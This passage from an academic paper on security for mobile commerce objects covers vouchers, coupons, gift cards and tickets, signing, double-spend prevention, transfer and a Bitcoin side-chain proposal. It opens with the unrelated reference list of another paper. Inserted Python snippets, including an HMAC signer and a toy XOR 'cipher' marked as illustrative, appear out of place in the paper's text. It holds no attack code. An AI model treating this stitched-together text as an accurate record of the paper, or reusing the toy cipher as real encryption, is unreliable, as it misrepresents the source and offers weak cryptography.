[10] C. Cadar and K. Sen, “Symbolic execution for software testing: Three decades later,” Communications of the ACM, vol. 56, no. 2, 2013, pp. 82–90.
[11] T. Kremenek, “Finding software bugs with the Clang static analyzer,” LLVM Developers’ Meeting, Aug. 2008, retrieved: 09/2014. [Online]. Available: http://llvm.org/devmtg/2008-08/Kremenek\ StaticAnalyzer.pdf
[12] A. Ibing, “Parallel SMT-constrained symbolic execution for Eclipse CDT/Codan,” in Int. Conf. Testing Software and Systems (ICTSS), 2013, pp. 196–206.
[13] A. Laskavaia, “Codan – C/C++ static analysis framework for CDT,” in EclipseCon, 2011, retrieved: 09/2014. [Online]. Available: http://www.eclipsecon.org/2011/sessions/index0a55.html?id=2088
[14] F. Nielson, H. Nielson, and C. Hankin, Principles of Program Analysis. Springer, 2010.
[15] P. Boonstoppel, C. Cadar, and D. Engler, “RWset: Attacking path explosion in constraint-based test generation,” in Tools and Algorithms for the Construction and Analysis of Systems (TACAS), 2008, pp. 351–366.
[16] T. Boland and P. Black, “Juliet 1.1 C/C++ and Java test suite,” IEEE Computer, vol. 45, no. 10, 2012, pp. 88–90.
[17] R. Martin, S. Barnum, and S. Christey, “Being explicit about security weaknesses,” CrossTalk: The Journal of Defense Software Engineering, vol. 20, no. 3, 2007, pp. 4–8.
[18] T. Parr, Language Implementation Patterns. Pragmatic Bookshelf, 2010.
[19] E. Gamma, R. Helm, R. Johnson, and J. Vlissides, Design Patterns: Elements of Reusable Object-Oriented Software. Addison-Wesley, 1994.
[20] P. Godefroid, M. Levin, and D. Molnar, “Automated whitebox fuzz testing,” in Network and Distributed System Security Symp. (NDSS), 2008.
[21] N. Tillmann and J. Halleux, “Pex – white box test generation for .NET,” in Int. Conf. Tests and Proofs (TAP), 2008, pp. 134–153.
[22] W. Visser, C. Pasareanu, and S. Khurshid, “Test input generation with Java PathFinder,” in Int. Symp. Software Testing and Analysis (ISSTA), 2004, pp. 97–107.
[23] V. Kuznetsov, J. Kinder, S. Bucur, and G. Candea, “Efficient state merging in symbolic execution,” in Conf. Programming Language Design and Implementation (PLDI), 2012, pp. 193–204.
[24] A. Ibing, “Path-sensitive race detection with partial order reduced symbolic execution,” in Workshop on Formal Methods in the Development of Software (WS-FMDS), 2014, in press.
Security Extensions for Mobile Commerce Objects
Nazri Abdullah
Faculty of Computer Science and Information Technology
Universiti Tun Hussein Onn Malaysia
Johor, Malaysia
anazri@uthm.edu.my

Ioannis Kounelis, Sead Muftic
School of Information and Communication Technology
Royal Institute of Technology (KTH)
Stockholm, Sweden
{kounelis, sead}@kth.se
Abstract - Electronic commerce and its variant, mobile
commerce, have tremendously increased in popularity in the
last several years. As mobile devices have become the most
popular means to access and use the Internet, mobile commerce
and its security are timely and very hot topics. Yet, today there
is still no consistent model of various m–commerce applications
and transactions, let alone a clear specification of their security.
In order to address and solve those issues, in this paper, we
first establish the concept of mobile commerce objects, an
equivalent of virtual currencies, used for m–commerce
transactions. We describe functionalities and unique
characteristics of these objects; we follow with security
requirements, and then offer some solutions – security
extensions of these objects. All solutions are treated within the
complete lifecycle of creation and use of the m–commerce
objects.
Keywords - mobile commerce; m–commerce; m-objects;
security; privacy
I. INTRODUCTION
As mobile commerce (m-commerce) continues to evolve,
it is only a matter of time before it becomes the main source
of online commerce [1]. In this paper, we describe our vision
of m-commerce, differentiating the goods that can be
purchased into seven categories, which we call m-commerce
objects. The m-objects have different requirements and are
therefore treated separately from the actors involved
in a mobile commerce transaction.
We first provide the results of our analysis of the current
concept of m-commerce objects. However, we also take two
further steps: we consider the security features and
extensions that these objects need, and moreover which
mechanisms and technologies can be used to ensure and
enforce such extensions.
Our research is focused on user aspects of various m–
commerce systems, ensuring that the mechanisms we
introduce allow users to protect their privacy and at the same
time to verify authenticity, integrity and availability of
digital goods that they are purchasing.
The next section of the paper describes various examples
of m-commerce objects, based on our concept of a so-called
generic m–commerce object. Section 3 introduces the main
actors in an m-commerce scenario. Section 4 analyses
security features and requirements targeted as goals of our
design and also describes methodologies and technologies
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
that can be used for implementation of those features.
Section 5 demonstrates the dynamic use of the m-objects
security features. Section 6 briefly introduces one of the
popular m–commerce payment systems – Bitcoin and
justifies our use of some of the innovative ideas that Bitcoin
has introduced. Section 7 contains related work and
compares its results with ours, while in section 8 we discuss
our findings and approach. Finally, section 9 contains
conclusions and suggestions for future work.
II. SPECIFICATION OF MOBILE COMMERCE OBJECTS
It is important to understand the similarities and
differences between various types of m-commerce objects.
The definitions given below have also been documented in
our previously published research paper [2]. The criterion for
some well-known transactions to be classified as m–
commerce objects is whether they have direct (explicit) or
indirect (implicit) value. An example of an m–commerce
object with explicit value is a pre–paid card – its value is
money paid for the card. An example of an object with
implicit value may be various discounts or benefits based on
different types of memberships.
In this section, we list typical m–commerce objects in an
order starting from those that do not have explicit value all
the way up to those that have strictly determined value. The
objects are also sorted by the increasing complexity of their
use.
The first type of m–commerce object is promotions. They
publicize a product or a service with a discount, so that the
offered discount represents an implicit value of this type of
m–commerce object [3]. In a mobile digital environment,
these objects can be managed through personalized
advertisements received through the Internet or even through
a personal area network. A citizen with a Bluetooth enabled
phone, for example, may receive personalized promotions or
discounts to his/her phone via Bluetooth when shopping in a
mall. The project PROMO demonstrates how this can be
achieved [4]. Promotions do not require payments by users,
which means that this type of m–commerce objects can be
obtained without associated financial transaction.
The next type of m–commerce object is a mobile coupon.
These are text or picture vouchers, solicited or purchased, and
delivered to a consumer’s mobile phone. This object can be
stored and exchanged for a financial discount, when
purchasing a product or service [5]. The most important
186
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
difference between promotions and coupons is that coupons
have a value (expressed either as discount or monetary
value), while promotions are mostly used for advertising of
discounts.
The third type of m–commerce object that we consider
is a standard voucher, used today mainly in paper form. It is
a small printed piece of paper that represents the right to
claim goods or services [6]. In the case of an m-voucher,
there is no printed copy, but a digital equivalent with the
unique identifier, such as a barcode or a Quick Response
(QR) code, stored locally on the phone or remotely at the
m–commerce server. Examples of such vouchers are the
coupons distributed by Groupon [7] or other similar
companies. In order to acquire a voucher, a payment
transaction is usually involved. The difference between a
voucher and a coupon is that the voucher is a complete
representation of a product or a service, while the coupon is
an offer/discount for the product or service. In other words,
having a voucher means that the specific product has
already been bought in advance while with a coupon
consumers may claim it at alternative places or not at all, if
the coupon was not purchased.
Another type of m–commerce object is a gift card. In real
life it is usually a tangible device (plastic card), embedded
or encoded in a plastic, electronic or other form with a value
based on a payment, which promises to provide to the bearer
merchandise of value equal to the remaining balance of the
card [8]. In a digital environment, a gift card can be seen as
an equivalent to a very specific and limited pre–paid amount
in an e-wallet, which can be used only with the specific
merchant, in a particular shop or for a particular series of
products. The difference with the voucher is that a gift card
can be used repeatedly, as long as there is credit left on the
card. The voucher, however, is usually limited to one or to a
predefined number of claims.
Mobile ticketing is the electronic realization, with the
help of a mobile device, of the proof of access or usage
rights to a particular service [9]. There are many forms and
ways to purchase a mobile ticket. Usually, a Short Message
Service (SMS) message is the outcome of the purchase (the
receipt).
A pre-paid card has many similarities with the gift card.
It is a value stored in an e-wallet or in some account that can
be loaded with money in order to be used mostly for
micropayments [10]. The main difference with a gift card is
that a pre-paid card is intended to be used by the owner and
not to be gifted to another party and is usually not limited to
specific merchants. More importantly, a pre-paid card can
be recharged when the pre–paid amount is exhausted. By
its purpose and the type of transactions supported, the very
popular pre–paid airtime may also be considered one type
of pre–paid card. In the case of airtime, such an m–commerce
object is usually called a telecom account.
Our final example and type of m–commerce object is a
bonus card (also called loyalty card). This type of object
usually refers to the accumulation of points that a user gains
from various purchases [11]. They are usually represented
as supermarket cards, airline bonus cards, membership
cards, etc., issued by merchants/businesses that give points
to the customers depending on the value of goods or
services that they previously purchased. Their owners can
later use these points, in exchange for products or services.
Such cards are usually free to acquire, but are bound to a
user (or to a small closed and related group of users, such as
members of a family).
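The seven object types listed above can be summarized in a small data model. The following sketch is ours, not a published schema; the field names are assumptions chosen to reflect the attributes discussed in this paper (explicit value, whether a payment is needed, and multiple use):

```python
# Illustrative data model for the seven m-commerce object types.
# Field names are assumptions for this sketch, not a published schema.
from dataclasses import dataclass
from enum import Enum

class MObjectType(Enum):
    PROMOTION = "promotion"        # implicit value, free of charge
    COUPON = "coupon"              # discount or monetary value
    VOUCHER = "voucher"            # full pre-paid claim on a product/service
    GIFT_CARD = "gift_card"        # merchant-bound, rechargeable balance
    TICKET = "ticket"              # proof of access rights
    PREPAID_CARD = "prepaid_card"  # owner-bound, rechargeable balance
    BONUS_CARD = "bonus_card"      # accumulated loyalty points

@dataclass
class MObject:
    kind: MObjectType
    explicit_value: float  # 0.0 for objects with only implicit value
    purchased: bool        # was a payment needed to acquire it?
    multi_use: bool        # can it be partially/repeatedly redeemed?

promo = MObject(MObjectType.PROMOTION, explicit_value=0.0,
                purchased=False, multi_use=True)
print(promo.kind.value)
```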
III. THE CONCEPT OF M-COMMERCE TRANSACTIONS
In this section, we introduce the main actors and define
their roles in a typical m–commerce transaction together with
the terms used and their interpretation. The purpose is to
help the reader better understand the text in the remaining
sections of the paper.
There are four actors in an m–commerce transaction:
1) Merchant: This is a business entity that offers some
services or products for purchase. Merchants define
availability, price, and all specific attributes of the m-commerce objects they issue and accept.
2) Customer/User/Client: The customer is the entity that
obtains or purchases an m-commerce object in order to
later redeem it.
3) Redemption Point/Redeemer: The place where m-commerce objects can be redeemed. In some cases this
entity can be the same as the entity that issued the
object, but most likely they will differ. For example,
when buying a ticket for a concert, the merchant is the
company selling tickets, while the redemption point is
the venue where the concert takes place.
4) m–Commerce Services Provider: This is a trusted–third
party in our system. It is the central entity that all other
actors communicate with in order to handle their
requests. Depending on the actor, different roles and
services may be offered by the services provider.
Merchants use the provider to make available their m-commerce objects, customers use it to acquire such
objects and later use them, and redemption points use it
for verification of validity of m-commerce objects in
the redemption phase.
IV. SECURITY FEATURES AND ATTRIBUTES OF M-COMMERCE OBJECTS
Each m-commerce object has a number of attributes that
define it, both in terms of security and usability. Such
attributes are required by both participating parties, i.e.,
objects' issuers (merchants, m–commerce providers) and
users, as their enforcement is an advantage for all parties.
187
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
A. Authenticity of m–Commerce Objects
This security property refers to the capability of the
recipient to verify the originality of the m-commerce object,
which includes verification of the identity of its issuer as
well as correct and original contents of an objet. Verification
can be performed by both the customer and the redeemer.
The customer should perform this check in the process of
acquisition of an m-commerce object, i.e., before paying for
it. This should be done in a timely manner, without
interfering with the customer’s purchasing experience in any
way. In the best case, it should be an automated procedure,
embedded in the acquisition phase and fully transparent to
the user. The user should only be informed of the outcome of
the procedure before giving the consent to proceed with the
payment.
The redeemer should also perform verification of the
object’s authenticity before redeeming the m-commerce
object. Such action should be performed with the assistance
of the m–commerce Provider. This control will protect the
redeemer against fraudulent attempts to acquire fake m-commerce objects.
Authenticity of m–commerce objects can be supported
by the issuer (merchant or m–commerce provider) by
digitally signing the object. Then the client will be able to
verify the signature, as the certificates of either the provider
or the merchant will be known to him/her.
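The sign-then-verify workflow described above can be sketched as follows. A real deployment would use a public-key signature (e.g., RSA or ECDSA) verified against the issuer's certificate, as the text describes; in this self-contained sketch an HMAC with a placeholder shared key stands in for the signature, and all names are our assumptions:

```python
# Sketch of issuer authentication for an m-commerce object.
# An HMAC with a shared demo key stands in for the issuer's
# public-key digital signature; the workflow is the point here.
import hashlib, hmac, json

ISSUER_KEY = b"issuer-demo-key"  # assumption: placeholder key material

def sign_object(obj: dict) -> dict:
    """Issuer attaches an authentication tag over the object's contents."""
    payload = json.dumps(obj, sort_keys=True).encode()
    signed = dict(obj)
    signed["signature"] = hmac.new(ISSUER_KEY, payload,
                                   hashlib.sha256).hexdigest()
    return signed

def verify_object(signed: dict) -> bool:
    """Client or redeemer checks issuer identity and content integrity."""
    body = {k: v for k, v in signed.items() if k != "signature"}
    payload = json.dumps(body, sort_keys=True).encode()
    expected = hmac.new(ISSUER_KEY, payload, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signed["signature"])

voucher = sign_object({"type": "voucher", "value": 25.0, "owner": "user-17"})
print(verify_object(voucher))   # True for the original object
voucher["value"] = 250.0
print(verify_object(voucher))   # False after tampering
```

In the acquisition phase this check would run automatically before the user consents to pay, as the section recommends.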
B. Security of m–Commerce Objects
When referring to the security of an m-commerce object,
we are actually referring to two different aspects: the
integrity and the confidentiality of its content. These two
issues together can be also interpreted as the user’s privacy.
1) Integrity: Integrity refers to protection of the m-commerce object's values against illegal intentional or
accidental modifications, after its creation. This security
feature is actually equivalent to authenticity, described
in the previous section. Therefore, all the mechanisms
described above also apply to integrity.
2) Confidentiality of Content/Privacy for the User:
Confidentiality of the content refers to the user’s privacy
when proving that he/she is the owner of an m-commerce
object. This property is not applicable to all m-commerce
objects, but rather depends on the type and the sensitive
nature of the object.
Namely, the user should be able to prove that he/she is
the owner of an object without revealing any information of
what he/she has purchased with that object. The content of
the object should be encrypted by the user upon purchase
and will only be decrypted when redeemed. In the
intermediate states, a header/part of the m-commerce object,
indicating the owner, will be unencrypted, but signed by the
issuer. If the m–commerce provider is involved, it is already
in possession of user’s identifying information and therefore
there is no need to exchange any extra data with every
purchase. The user should be able to define the sensitivity level
of the content in accordance with his/her preferences and then
the system will enforce those preferences during the
acquisition phase.
The security mechanisms for confidentiality of m–
commerce objects are standard symmetric key crypto
algorithms. What makes this feature very complicated to
design and implement is the use of partial values of some
objects. For instance, gift cards or pre–paid cards may be
partially redeemed. In such situations, encrypted objects
must be decrypted, partially claimed, and then the new
contents must be encrypted again.
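The decrypt / partially claim / re-encrypt cycle can be sketched as follows. The XOR "cipher" below is a deliberately toy stand-in for a real symmetric algorithm such as AES (which the standard algorithms mentioned above would provide); only the workflow, not the cryptography, is the point:

```python
# Sketch of partial redemption of an encrypted m-commerce object.
# The hash-based XOR keystream is a TOY cipher for illustration only;
# a real system would use a standard symmetric algorithm (e.g., AES).
import hashlib, json

def _keystream(key: bytes, n: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def encrypt(key: bytes, obj: dict) -> bytes:
    data = json.dumps(obj).encode()
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))

def decrypt(key: bytes, blob: bytes) -> dict:
    data = bytes(a ^ b for a, b in zip(blob, _keystream(key, len(blob))))
    return json.loads(data)

key = b"user-demo-key"  # assumption: user's symmetric key
blob = encrypt(key, {"type": "gift_card", "balance": 50.0})

# Partial redemption: decrypt, claim part of the value, re-encrypt.
card = decrypt(key, blob)
card["balance"] -= 20.0
blob = encrypt(key, card)
print(decrypt(key, blob)["balance"])  # 30.0
```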
C. Duplication
This is the property of m–commerce objects that
specifies whether an object can be duplicated, i.e., whether a
valid and legitimate copy of an m-commerce object can be
created by its owner. Obviously, if objects have explicit
value, this possibility should be prevented. In some virtual
currency systems this feature is called prevention of “double
spending”.
In order to guarantee non–duplication, if required, a
signature created over a random, unique, non–replicated
value is needed. Therefore, the issuer will have to create a
new value and sign a counter, possibly along with a
timestamp, which when duplicated will not be possible to be
changed, since in that case the signature will not be valid.
This security property is useful when an instance of an
m-commerce object must be unique. A voucher for a specific
service or a ticket for a concert are examples of
non–duplicated objects. On the other hand, if an m-commerce object is a free-of-charge promotion, it is actually
in the merchant’s interest to have the object duplicated and
distributed as widely as possible, as this will give it more
visibility.
The unique value or counter must be specified by the
issuer in the process of creation of the object. In cases where
users create copies of the object, the redemption of the
second instance of the object will not be accepted as the
unique value of the counter will be checked by the
redemption point. This verification is very tricky in open,
distributed environments and the Bitcoin concept has
successfully addressed and eliminated this problem. This is
one more reason why we have adopted its concept and some
specific solutions for security of our m–commerce objects.
There is of course a risk that an m-commerce object is
illegally duplicated after its first redemption and the illegal
copy is distributed to some other entity. Then, when the
legitimate owner tries to redeem the original object, he/she
will be denied redemption. This problem may be eliminated
by having the owner sign the object as well. Therefore, if
there is an attempt to redeem another copy of the same
object, the owner will be consulted for approval as well. In
addition, if the same person is trying to cheat the system, the
unique identifier of the object will be sufficient to prohibit
such action.
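The double-spend check described in this subsection can be sketched as follows: the issuer embeds a signed unique value, and the redemption point keeps a record of values it has already accepted. As before, an HMAC with a demo key stands in for the issuer's digital signature, and all names are assumptions of this sketch:

```python
# Sketch of non-duplication: a signed unique nonce per object, plus a
# redemption point that rejects signatures it has already seen.
import hashlib, hmac, secrets

ISSUER_KEY = b"issuer-demo-key"  # assumption: placeholder key material

def issue(kind: str) -> dict:
    nonce = secrets.token_hex(16)  # random, unique, non-replicable value
    tag = hmac.new(ISSUER_KEY, f"{kind}:{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return {"kind": kind, "nonce": nonce, "signature": tag}

class RedemptionPoint:
    def __init__(self):
        self.redeemed = set()

    def redeem(self, obj: dict) -> bool:
        tag = hmac.new(ISSUER_KEY, f"{obj['kind']}:{obj['nonce']}".encode(),
                       hashlib.sha256).hexdigest()
        if not hmac.compare_digest(tag, obj["signature"]):
            return False                 # forged or modified object
        if obj["nonce"] in self.redeemed:
            return False                 # duplicate: already spent
        self.redeemed.add(obj["nonce"])
        return True

ticket = issue("concert_ticket")
point = RedemptionPoint()
print(point.redeem(ticket))        # True: first redemption succeeds
print(point.redeem(dict(ticket)))  # False: a copy is rejected
```

Keeping this "already redeemed" record consistent across an open, distributed system is exactly the hard part the text attributes to Bitcoin's solution.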
D. Transferability
This feature represents the ability to legitimately change
the ownership of an m-commerce object.
If objects are transferable, this action must be performed
with the assistance of the m–commerce provider, since it is
the actor responsible for signing the object and assigning its
ownership. Moreover, even if a transfer is initiated or
performed by one person to another person, the two entities
will protect their privacy between them, as they will not have
to exchange any details apart from their system identifiers
(usually randomly assigned identifiers (IDs)).
The provider will receive a “transfer request” command
from the current owner along with the ID of the recipient and
then, if and only if the new owner meets all security
requirements associated with the specific object, for instance
age limit, the transfer will be performed. The owner of the
object will be changed and the object will be re–signed by
the m–commerce provider.
A drawback of this approach is the necessity of connectivity
to the provider's server at the time of the exchange. If
the server is not accessible at the time of the transaction, the
request may be temporarily saved on the current owner’s
station and when the connection is established, the request
will be forwarded to the server and the transfer of the object
will be performed.
Finally, at this stage of our research, the option to charge a
fee for this exchange is not considered. All transfers
are free of charge. The payment to acquire the m-commerce
object from the provider has already been made by the first
owner.
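The transfer protocol above, including the security-requirement check (here only an age limit), the re-signing by the provider, and the offline queue for an unreachable server, can be sketched as follows. The data and function names are illustrative assumptions:

```python
# Sketch of the transfer protocol: the provider checks the recipient's
# eligibility, changes the owner, and re-signs the object. Requests made
# while the server is unreachable are queued locally and forwarded later.
import hashlib, hmac, json

PROVIDER_KEY = b"provider-demo-key"  # assumption: placeholder key

def resign(obj: dict) -> dict:
    """Provider (re-)signs the object after any change of ownership."""
    body = {k: v for k, v in obj.items() if k != "signature"}
    obj["signature"] = hmac.new(PROVIDER_KEY,
                                json.dumps(body, sort_keys=True).encode(),
                                hashlib.sha256).hexdigest()
    return obj

users = {"u1": {"age": 25}, "u2": {"age": 15}, "u3": {"age": 30}}
pending = []  # transfer requests saved while the server is unreachable

def transfer(obj: dict, new_owner: str, online: bool = True) -> dict:
    if not online:
        pending.append((obj, new_owner))   # forwarded once reconnected
        return obj
    if users[new_owner]["age"] < obj.get("min_age", 0):
        return obj                          # recipient fails the age limit
    obj = dict(obj)
    obj["owner"] = new_owner
    return resign(obj)

wine_voucher = resign({"item": "wine", "owner": "u1", "min_age": 18})
print(transfer(wine_voucher, "u2")["owner"])  # u1: under-age, refused
print(transfer(wine_voucher, "u3")["owner"])  # u3: transfer performed
```

Note that only system identifiers ("u1", "u3") cross between the two parties, matching the privacy property described above.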
E. Monetary Value
Monetary value is the attribute representing the financial
value of the m-commerce object, i.e., if it can be
“exchanged” for something that has a cost.
This property does not provide any extra feature or
option, unlike all the previous ones, but rather is a key factor
affecting which of the previous mechanisms must be
enforced for the specific m-commerce object itself. It can be
better viewed as a property rather than an extra attribute.
If an m-commerce object has a monetary value, then, it is
both in the merchant’s as well as in the consumer’s interest
to have the object secured in all the above mentioned ways.
As a conclusion, authenticity, non–duplication, integrity, and
confidentiality for each object are needed.
The contents of each object are cryptographically
encapsulated by the m–commerce provider and therefore the
m–commerce objects cannot be tampered with. It is up to the
object's owner to disclose such information to any third
parties or to reveal it only when absolutely needed (during
the redemption process).
F. Purchased
M-commerce objects have this property if money is
needed in order to acquire the object.
This property is strongly linked to the monetary value
property. What applies there is also applicable to this
property as well. Whether an object has been purchased or
not indicates solely the way in which the owner has acquired
it, while monetary value also indicates the actual value of
the object.
G. Multiple/Partial Use
This property indicates whether an m-commerce object
can be used more than once, i.e., if its total value may be
partially redeemed. If yes, then such functionality can be
enforced in two different ways:
1) There is a predefined number of uses that is decreased
after each use (or increased when the user buys some
more quantities of the object). An example may be
tickets for public transportation.
2) It can be an amount (in Euros for example) that is
decreased (or increased if the user charges the object).
This is mostly valid for a gift card.
In both cases, the m–commerce provider must be
involved in order to approve/confirm the remaining number
of uses or the amount/value of the object. The new value of
the object, after its adjustment, is signed and therefore can be
verified by the provider at any time.
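The first variant above, a predefined number of uses decremented and re-signed by the provider after each use, can be sketched as follows (an HMAC again stands in for the provider's signature, and the names are our assumptions):

```python
# Sketch of multiple/partial use: after each redemption the provider
# decrements the remaining count and re-signs the object, so the current
# value is always covered by a valid signature.
import hashlib, hmac, json

PROVIDER_KEY = b"provider-demo-key"  # assumption: placeholder key

def provider_sign(obj: dict) -> dict:
    body = {k: v for k, v in obj.items() if k != "signature"}
    obj["signature"] = hmac.new(PROVIDER_KEY,
                                json.dumps(body, sort_keys=True).encode(),
                                hashlib.sha256).hexdigest()
    return obj

def use_once(obj: dict) -> dict:
    """One redemption, confirmed and re-signed by the provider."""
    if obj["uses_left"] <= 0:
        raise ValueError("object exhausted")
    obj = dict(obj)
    obj["uses_left"] -= 1
    return provider_sign(obj)

transit_ticket = provider_sign({"type": "transport_ticket", "uses_left": 10})
transit_ticket = use_once(transit_ticket)
print(transit_ticket["uses_left"])  # 9
```

The second variant (a monetary amount on a gift card) works identically with a balance field in place of the use counter.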
H. Tracking
This is the ability of the system to track past transactions
and determine the current status of the object, i.e., the ability
to track its full life cycle.
The attributes of the m–commerce objects that may be
interesting when tracking are the date of creation, previous
uses in terms of volume and content, and information about
all previous owners. All these aspects depend on the type of
the specific m-commerce object and the specific values of its
attributes.
Tracking an object’s history may be performed by the
user without the need to engage the m–commerce provider in
that process. For example, all previous uses can be recorded
in the header of the object and in that way they may be
retrieved in a read-only mode. They are always signed by the
m–commerce provider. As such, it is generally
recommended to reveal the values of all non–sensitive
attributes (in terms of user privacy) in a read-only mode, so
users can retrieve them at any given time, without the
requirement to be online and connected to the Internet.
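The offline-readable, provider-signed history described above can be sketched as a list of signed entries stored in the object's header. The entry format is an illustrative assumption; an HMAC stands in for the provider's signature:

```python
# Sketch of tracking: each lifecycle event is a provider-signed entry in
# the object's header, readable by the user without contacting the server.
import hashlib, hmac, json

PROVIDER_KEY = b"provider-demo-key"  # assumption: placeholder key

def signed_entry(event: dict) -> dict:
    tag = hmac.new(PROVIDER_KEY, json.dumps(event, sort_keys=True).encode(),
                   hashlib.sha256).hexdigest()
    return {"event": event, "signature": tag}

history = [
    signed_entry({"action": "created", "date": "2014-01-10"}),
    signed_entry({"action": "redeemed", "amount": 5, "date": "2014-02-02"}),
]

# The user can list past transactions offline, in a read-only way:
for entry in history:
    print(entry["event"]["action"])
```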
V. DYNAMIC USE OF SECURITY FEATURES
The security features described above are based on the
basic set of security services: confidentiality, integrity, and
authenticity, and may be applied during any phase of an m-commerce object's lifecycle. However, what makes these
features different from the classical application of security
services in some other network application is that they are
applied in a very dynamic way.
The reason for the dynamic applicability is the complex
reuse of the majority of the m-commerce objects. For
example, a voucher that has a specific number of admissions
to a service needs to have this number updated accordingly
after each use. This implies that various features, established
in the initial phase when creating an object, are re-applied
after every use of the object. Therefore, in the case of m–
commerce objects, special security protocols are needed,
supporting repetitive application of security services. These
protocols effectively ensure that, in all phases of
its lifetime, each m-commerce object meets all the security
requirements according to its special needs and properties.
As explained earlier, these needs and requirements are
determined by the attributes of the specific m-commerce
object, each depending on their contents and the nature of
use. A full list of significant attributes for our m–commerce
objects is given in Table 1.
TABLE I. M–COMMERCE OBJECTS AND THEIR ATTRIBUTES
The enforcement of security services that support those
requirements takes place at both the client side and the
server side. Clients control the object's authenticity and
conformity to a predefined set of standard attribute values.
The server creates these attributes and cryptographically
encapsulates them, thus binding security credentials to the
values of the m–commerce attributes. When a value of some
attribute of an m-commerce object needs to be changed, the
client sends a corresponding request to the server which
performs the same procedure all over again, updating the
values of m-commerce objects’ attributes. By “client” in this
case we do not necessarily mean the end–user but also any
other entity in the m–commerce transactions chain, such as a
merchant or a retailer. For a more comprehensive description
of the actors and their interactions, the reader should refer to
[2].
A. Comparison with a traditional secure-by-design system
To illustrate how the dynamic nature of security services
differs from some other traditional network applications,
in this section we compare our previous work, a secure e-mail system based on Secure/Multipurpose Internet Mail
Extensions (S/MIME) and security proxies [12], with the
dynamic use of security services described above.
Figure 1. Secure Email Use. The security functionalities stay within the
Secure Email proxy.
In the secure e-mail system, the use of security is
straightforward. When a security method is applied, for
example encryption or signing of an e-mail letter, a security
action takes place at the e-mail client or at the security proxy
and it is directly applied to the complete and final form of the
specific e-mail letter. Then, in order to read such a letter, i.e.,
decrypt or verify it, the e-mail client or the proxy server is
again used. In the intermediate states of the protected e-mail
letter, a third party cannot manipulate the message. For the
client, the security is completely transparent; he/she only
sees the “clear” output regardless of the way he/she accesses
the proxy server. When accessing the secure e-mail from any
end device (see Figure 1, i-iv), the result for the client is the
same as for all the security functionalities that are performed
internally.
Figure 2. The dynamic reuse of security attributes for an m-commerce
object.
In the m-commerce case, security services and
mechanisms are re-applied after every use of the m-commerce object. Although there is a similarity in the two
cases, in the sense that the server is the one that takes care of
the enforcement of the security, the use for the client is
different. When the client uses the m-object, the values of
the m-object change. This directly implies that the signature
and the authenticity of the m-object are not the same anymore
and as a result the security attributes need to be readjusted to
the new data. The server is the one that takes the
responsibility of fulfilling this task and then resends the
newly adjusted m-object to the client. The client, however, in
this case has the ability to verify and recognize the security
enhancements. This can be seen in Figure 2; as the mcommerce object is used in the real world (i-iii), its values
change. These changes are taken into account each time at
the server and as a result all the security attributes are reapplied. The attributes can be read not only by the server but
also from the client side.
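The re-signing cycle can be sketched as follows. The object fields, the key name and the use of an HMAC are our own illustrative assumptions, not the paper's actual mechanism:

```python
import hashlib
import hmac
import json

# Assumed server-side signing key (illustrative only).
SERVER_KEY = b"server-signing-key"

def sign(values: dict) -> str:
    # Security attribute over the object's current values.
    payload = json.dumps(values, sort_keys=True).encode()
    return hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()

m_object = {"type": "ticket", "uses_left": 2}
m_object_sig = sign(m_object)

# The client uses the m-object; its values change, so the old
# signature no longer matches the data.
m_object["uses_left"] -= 1
assert sign(m_object) != m_object_sig

# The server readjusts the security attributes to the new data
# and resends the newly adjusted m-object.
m_object_sig = sign(m_object)
assert sign(m_object) == m_object_sig  # client can verify the new attributes
```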
VI. BITCOIN SYSTEM
Bitcoin [13] is a virtual currency that has become very popular in the last few years. It uses a peer-to-peer network to authorize and verify transactions and, unlike traditional payment systems, has no central authority. One of its main advantages is that transactions are anonymous (actually pseudonymous) and third parties are not involved when performing payments or transferring money, not even for verification of participants.
Although the details of the protocol are beyond the scope of this paper, we briefly review some of the innovative features that Bitcoin has introduced in the payment environment and indicate how these features can be applied and improved for the security of our own system, that is, for the security of other virtual currencies.
The most interesting feature of the Bitcoin system is the concept and use of the blockchain. Transactions are grouped into blocks of data and these blocks are linked in a chain, called the blockchain. Therefore, the blockchain contains and reveals the history of all transactions that have taken place in the Bitcoin system since its creation. In order for a new transaction to be considered valid and accepted in the system, it must be included in the blockchain and then verified by applying mathematically and computationally complex procedures. Moreover, all accounts (Bitcoin addresses) in the Bitcoin system are publicly visible, which means that anyone can check the balance of each account and how it has accumulated its current balance.
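The chaining idea can be illustrated with a minimal sketch; this is our own simplification, not the real Bitcoin block format:

```python
import hashlib
import json

def block_hash(block: dict) -> str:
    # Each block commits to its transactions and to its predecessor.
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

genesis = {"prev": "0" * 64, "txs": ["coinbase"]}
block1 = {"prev": block_hash(genesis), "txs": ["alice->bob: 1"]}
block2 = {"prev": block_hash(block1), "txs": ["bob->carol: 1"]}

# Tampering with an old transaction breaks every later link,
# which is what makes the recorded history verifiable.
genesis["txs"] = ["coinbase", "forged"]
assert block1["prev"] != block_hash(genesis)
```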
As Bitcoin addresses are long random strings of characters without any inherent meaning, there is no direct link between the owner of an address and the address itself. Nonetheless, it is still feasible for someone to try to find leaked information about identities and the addresses that belong to them. This property is nevertheless very useful for protecting one's privacy. We would like to extend it by offering both anonymous transactions and the possibility to have verified and authorized transactions for authorities and users who
need verification of authenticity and reliability of selected
transactions.
Our intention is to create a side-chain to Bitcoin, starting with one of the m-commerce objects. A side-chain is a separate blockchain, which is backed by Bitcoins in the same way that currencies are backed by gold [14]. In doing so, we will be able to take advantage of the above-mentioned Bitcoin characteristics, while manipulating the side-chain according to the m-object's needs.
VII. RELATED WORK
The concept of m-commerce is not new to the research
community. From the early years of mobile device adoption,
both with the use of the first mobile smart phones or with the
use of Personal Digital Assistants (PDA), the importance and
potential growth of m-commerce was foreseen and a number
of research solutions with a focus on security were proposed.
